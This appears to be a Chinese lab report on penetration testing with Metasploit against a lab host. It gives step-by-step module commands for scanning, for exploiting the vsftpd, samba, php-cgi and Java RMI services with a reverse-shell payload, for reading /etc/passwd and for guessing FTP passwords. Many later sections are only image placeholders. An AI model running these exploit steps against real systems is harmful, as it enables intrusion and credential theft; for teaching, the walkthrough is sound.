網絡安全實驗報告 第五章

Metasploit基本介紹與配置

Metasploit作為一個非常全面的滲透工具,用來收集信息非常好用,信息收集的方法主要分為主動和被動方式。被動信息收集是指在不直接接觸目標系統的情況下,獲取目標主機的信息。比如,通過搜索引擎方式可以獲得目標主機操作系統,開放的端口號。主動信息收集是指可以通過掃描目標系統來確定目標主機開放的服務。主動收集信息的方法被IDS和IPS記錄的概率加大。
Metasploit中不僅能夠使用第三方掃描器,例如nmap工具。還可以利用其輔助模塊中包含的端口掃描功能發現活躍主機,這些模塊位于Metasploit源碼路徑的modules/auxiliary/scanner/discovery/目錄中,主要有arp_sweep、udp_probe、udp_sweep等。其中arp_sweep使用ARP請求枚舉本地局域網絡中的所有活躍主機,udp_sweep通過發送UDP數據包探查指定主機是活躍,并發現主機上的UDP服務。

1.2 在終端輸入命令msfconsole命令,啟動Metasploit終端,界面中會顯示集成攻擊模塊、輔助模塊、攻擊載荷模塊等。



1.3 在msf命令行下,啟用arp_sweep模塊。輸入命令use auxiliary/scanner/discovery/arp_sweep,啟用已經啟用了arp_sweep模塊。



1.7輸入命令run開始掃描。

1.9輸入命令run,查看結果。



1.10 發現活躍主機后,掃描一下主機的開放端口都有哪些,利用search portscan命令找到相關的工具。
1.11 下面先使用syn端口掃描器進行掃描,啟用syn掃描器,輸入命令:use auxiliary/scanner/portscan/syn,顯示參數設置完畢。
1.12 在終端下輸入run,顯示目標主機開放的端口號。注意:如果端口掃描失敗或者端口掃描得到的結果不理想,可以重新打開一個終端,使用nmap -sV 192.168.1.3來進行端口掃描,進而得到我們需要的結果。

1.13 在掃描過程中,可以針對某個已知的漏洞來對目標系統進行掃描,例如上圖中的21端口開放著,那么利用ftp_version模塊對主機進行掃描。輸入命令:use auxiliary/scanner/ftp/ftp_version 啟用模塊,設置掃描參數,顯示開啟了FTP服務。

1.14利用自帶的anonymous模塊檢查一下是否允許匿名登錄。輸入命令:use auxiliary/scanner/ftp/anonymous模塊,設置相關參數。然后輸入命令run。

如何針對多臺主機進行掃描?


Metasploit溢出vsftp特權提升漏洞

1.2 在終端中輸入命令“nmap –sV 192.168.1.3”,對目標主機進行端口掃描,發現開放21端口并且安裝vsftpd服務器軟件,版本為2.3.4。



1.3 在終端中輸入命令“msfconsole”,啟動MSF終端。
1.4 在終端中輸入命令“search vsftpd”,搜索vsftpd的相關工具和攻擊載荷,顯示vsftpd v2.3.4版本的漏洞利用模塊。



1.5 在終端中輸入命令“use exploit/unix/ftp/vsftpd_234_backdoor”,啟用漏洞利用模塊, 提示符就會提示進入到該路徑下。
1.6 在終端中輸入命令“show options”,查看需要設置的相關項,“yes”表示必須填寫的參數。

1.7 在終端中輸入命令“set RHOST 192.168.1.3”,設置目標主機的IP地址。
1.8 在終端中輸入“show payloads”, 顯示Metasploit中可以在遠程主機執行的代碼,即shellcode。



1.9 在終端中輸入“set PAYLOAD cmd/unix/interact”, 選擇在遠程主機執行的shellcode代碼。
1.10 在終端中輸入“exploit”, 實施攻擊。攻擊成功后,輸入命令“ifconfig”,查看IP為目標主機,表示溢出成功。

1.11 在終端中輸入“whoami”,查看獲得的權限為root,輸入命令“cat /etc/passwd”,查看系統的帳號和密碼。

Metasploit輔助模塊案例

Metasploit是一款開源的安全漏洞檢測工具,幫助使用者識別安全問題,驗證漏洞存在的有效措施,并對某些軟件進行安全性評估,提供真正的安全風險報告。Metasploit軟件提供多用戶接口,包括終端、命令行和圖形化界面。

1.3 利用arp_sweep模塊掃描一下局域網內的活躍主機信息。
1.4 在msf終端中輸入”set RHOSTS 192.168.1.0/24”命令,然后使用“show options”查看設置完的參數。
1.5 在msf終端中輸入”show options”命令列出arp_sweep模塊的各項參數設置,查看設置完的參數。



1.6 在msf終端中輸入”help”命令,查看可以使用的命令。
1.7 在help命令中提示,auxiliary模塊要使用run模塊運行。在msf終端中輸入”run”命令,查看運行效果,從輸出信息可知,局域網中只有192.168.1.3一臺主機在線。Arp_sweep模塊只能探測同一子網中的活躍主機,對于遠程主機,可以使用nmap掃描器。



1.9 可以利用metasploit中集成的端口掃描模塊了解活躍主機的詳細信息,在msf終端中輸入search portscan命令,查一下都有哪些可利用的模塊。簡單介紹一下掃描方式:auxiliary/scanner/portscan/ack 通過ACK掃描的方式對防火墻上未被屏蔽的端口進行探測;auxiliary/scanner/portscan/syn 通過發送TCP SYN標志的方式探測開放的端口;auxiliary/scanner/portscan/tcp 通過一次完整的TCP連接來判斷端口是否開放;auxiliary/scanner/portscan/xmas 通過發送FIN、PSH、URG標志,能夠躲避一些高級的TCP標記檢測器的過濾。
1.10 下面利用syn端口掃描模塊對目標主機掃描,收集詳細信息,在終端下輸入“use auxiliary/scanner/portscan/syn”,應用此模塊。
1.11 在終端中輸入“set RHOSTS 192.168.1.3”,設置掃描目標主機IP,輸入命令run進行掃描。注意:如果端口掃描失敗或者端口掃描得到的結果不理想,可以使用nmap -sV 192.168.1.3來進行端口掃描,進而得到我們需要的結果。

1.12 利用metasploit端口掃描輔助模塊確定開放端口,然后對相應端口上所運行服務的信息進行更深入的挖掘。在Metasploit的scanner輔助模塊中,[service_name]_version用于遍歷網絡中包含了服務版本,[service_name]_login對服務進行口令探測。
1.13 在msf終端中輸入”use auxiliary/scanner/ftp/ftp_version”命令,查看可以使用的命令.
1.14 在終端中輸入“set RHOSTS 192.168.1.3”設置掃描主機IP,在終端中輸入run進行掃描,從輸出顯示,主機為windows系統,開啟FTP服務。



1.15 輸入search ftp_login命令,搜索ftp_login模塊,嘗試進行口令試探攻擊。

1.16 在msf終端中輸入”use auxiliary/scanner/ftp/ftp_login”命令,應用此模塊。
1.17 利用set命令設置攻擊模塊的各項參數,然后輸入run命令運行攻擊,顯示administrator/Simplexue123賬號登陸成功。

二、課后習題
在使用ftp_login模塊時,可以使用密碼表進行破解嗎?

beef+Metasploit利用瀏覽器獲得shell

1.7輸入命令“/etc/init.d/postgresql start”,啟動postgresql服務。輸入命令“msfdb init”,初始化數據庫。



1.8在終端中輸入“msfconsole”啟動metasploit模塊,輸入命令”load msgrpc ServerHost=192.168.1.2 Pass=abc123”。 如圖8所示



1.10在終端輸入命令“./beef -x”加載模塊。

Metasploit溢出UnrealIRCd后門漏洞

1.2 在終端中輸入命令“nmap –sV 192.168.1.3”,對目標主機進行端口掃描,發現開放6667端口,對應的服務為unreal ircd。如圖2所示



1.4 在終端中輸入命令“search unreal ircd”,搜索ircd的相關工具和攻擊載荷。如圖4所示



1.9 在終端中輸入“whoami”,查看獲得的權限為root,輸入命令“cat /etc/passwd”,查看系統的帳號和密碼。如圖9所示

Metasploit溢出sysmlink 默認配置目錄遍歷漏洞

1.1 使用nmap命令對目標主機進行掃描。單擊桌面空白處,右鍵菜單選擇“在終端中打開”。如圖1所示



1.4 在終端中輸入命令“search samba”,搜索samba的相關工具和攻擊載荷。如圖4所示



1.9 在終端中輸入“exploit”, 開始攻擊。如圖9所示

1.12在終端中輸入“more /etc/passwd”, 查看目標主機系統中的密碼。如圖12所示


Metasploit溢出samba提權漏洞

1.2 在終端中輸入命令“nmap –sV 192.168.1.3”,對目標主機進行端口掃描,發現開放445端口、139端口并且安裝samba軟件,版本為3。如圖2所示

image.png

1.3 在終端中輸入命令“msfconsole”,啟動MSF終端。如圖3所示

image.png

1.4 在終端中輸入命令“search samba”,搜索samba的相關工具和攻擊載荷。如圖4所示

![Uploading image_247499.png . . .]

1.5 在終端中輸入命令“use exploit/multi/samba/usermap_script”,啟用漏洞利用模塊, 提示符就會提示進入到該路徑下。如圖5所示


image.png

在終端中輸入命令“info”,查看需要設置的相關項,“yes”表示必須填寫的參數。

image.png

1.7 在終端中輸入命令“set RHOST 192.168.1.3”,設置目標主機的IP地址。如圖7所示

image.png

1.8 在終端中輸入“exploit”, 開始向目標主機攻擊,攻擊成功后,建立會話。如圖8所示

image.png

1.9 在終端中輸入“whoami”,查看獲得的權限為root,輸入命令“ifconfig”,查看系統的網絡信息。如圖9所示

image.png

Metasploit溢出phpMyAdmin漏洞

1.2 在終端中輸入命令“nmap –sV 192.168.1.3”,對目標主機進行端口掃描,發現開放80端口。如圖2所示

image.png

1.3 在瀏覽器地址欄中輸入“http:\192.168.1.3”,訪問目標網站。如圖3所示

image.png

2.1 在終端中輸入命令“dirbuster”,啟動軟件對目標網站進行掃描。如圖4所示


image.png

2.3 掃描結果顯示包含cgi-bin目錄、phpmyadmin目錄等。如圖6所示


image.png

3.1 在終端中輸入命令“msfconsole”,啟動MSF終端。如圖7所示


image.png

3.2 在終端中輸入命令“search php_cgi”,搜索php_cgi的相關工具和攻擊載荷。如圖8所示


image.png

3.3 在終端中輸入命令“use exploit/multi/http/php_cgi_arg_injection”,啟用漏洞利用模塊, 提示符就會提示進入到該路徑下。如圖9所示


image.png

3.4 在終端中輸入命令“show payloads”,顯示Metasploit中可以在遠程主機執行的代碼,即shellcode。如圖10所示


image.png

3.5 在終端中輸入命令“set PAYLOAD php/meterpreter/reverse_tcp”,設置使用的shellcode代碼。如圖11所示


image.png

3.6 在終端中輸入“show options”,顯示攻擊模塊需要設置的參數。如圖12所示


image.png

3.7 在終端中輸入“set LHOST 192.168.1.2”,設置源主機的IP地址,用于會話的反向鏈接。如圖13所示


image.png

3.8 在終端中輸入“set RHOST 192.168.1.3”,設置目標主機的IP。如圖14所示


image.png

3.9

image.png

3.10

image.png

3.11

image.png

3.12

image.png

Metasploit溢出java RMI SERVER命令執行漏洞

1.2 在終端中輸入命令“nmap –sV 192.168.1.3”,對目標主機進行端口掃描,發現開放1099端口。如圖2所示


image.png

1.3 在終端中輸入命令“msfconsole”,啟動MSF終端。如圖3所示


image.png

1.4 在終端中輸入命令“search java_rmi_server”,搜索RMI的相關工具和攻擊載荷。如圖4所示


image.png

1.5 在終端中輸入命令“use exploit/multi/misc/java_rmi_server”,啟用漏洞利用模塊, 提示符就會提示進入到該路徑下。如圖5所示


image.png

1.6 在終端中輸入命令“show options”,查看需要設置的相關項,“yes”表示必須填寫的參數。如圖6所示


image.png

1.7 在終端中輸入命令“set RHOST 192.168.1.3”,設置目標主機的IP地址。如圖7所示


image.png

1.8 在終端中輸入“exploit”, 實施攻擊,攻擊成功后,建立連接會話。如圖8所示


image.png

1.9 在終端中輸入“sysinfo”,查看系統信息,輸入命令“Id”,查看用戶權限。如圖9所示


image.png

Metasploit溢出Distcc后門漏洞

1.2

image.png

1.3

image.png

1.4

image.png

1.5

image.png

1.6

image.png

1.7

image.png

1.8

image.png

1.9

image.png

Metasploit批量驗證爆破telnet

1.2

image.png

1.3

image.png

2.1

image.png

2.2

image.png

2.3

image.png

2.4

image.png

2.5

image.png

2.6

image.png

2.7

image.png

2.8

image.png

2.9

image.png

2.10

image.png

Metasploit對目標主機SSH爆破

1.2

image.png

1.3

image.png

1.4

image.png

1.5

image.png

1.6

image.png

1.7

image.png

1.8

image.png

1.9

image.png

1.10

image.png

1.11

image.png

1.12

image.png

Metasploit爆破Tomcat弱口令

1.2


image.png

1.3

image.png

1.4

image.png

1.5

image.png

1.6

image.png

1.7

image.png

1.8

image.png

1.9

image.png

1.10

image.png

1.11

image.png

1.12

image.png

1.13

image.png

1.14

image.png

1.15

image.png

1.16

image.png
最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市,隨后出現的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖,帶你破解...
    沈念sama閱讀 228,197評論 6 531
  • 序言:濱河連續發生了三起死亡事件,死亡現場離奇詭異,居然都是意外死亡,警方通過查閱死者的電腦和手機,發現死者居然都...
    沈念sama閱讀 98,415評論 3 415
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事。” “怎么了?”我有些...
    開封第一講書人閱讀 176,104評論 0 373
  • 文/不壞的土叔 我叫張陵,是天一觀的道長。 經常有香客問我,道長,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 62,884評論 1 309
  • 正文 為了忘掉前任,我火速辦了婚禮,結果婚禮上,老公的妹妹穿的比我還像新娘。我一直安慰自己,他們只是感情好,可當我...
    茶點故事閱讀 71,647評論 6 408
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發上,一...
    開封第一講書人閱讀 55,130評論 1 323
  • 那天,我揣著相機與錄音,去河邊找鬼。 笑死,一個胖子當著我的面吹牛,可吹牛的內容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 43,208評論 3 441
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 42,366評論 0 288
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后,有當地人在樹林里發現了一具尸體,經...
    沈念sama閱讀 48,887評論 1 334
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 40,737評論 3 354
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發現自己被綠了。 大學時的朋友給我發了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 42,939評論 1 369
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情,我是刑警寧澤,帶...
    沈念sama閱讀 38,478評論 5 358
  • 正文 年R本政府宣布,位于F島的核電站,受9級特大地震影響,放射性物質發生泄漏。R本人自食惡果不足惜,卻給世界環境...
    茶點故事閱讀 44,174評論 3 347
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧,春花似錦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 34,586評論 0 26
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至,卻和暖如春,著一層夾襖步出監牢的瞬間,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 35,827評論 1 283
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個月前我還...
    沈念sama閱讀 51,608評論 3 390
  • 正文 我出身青樓,卻偏偏與公主長得像,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 47,914評論 2 372

推薦閱讀更多精彩內容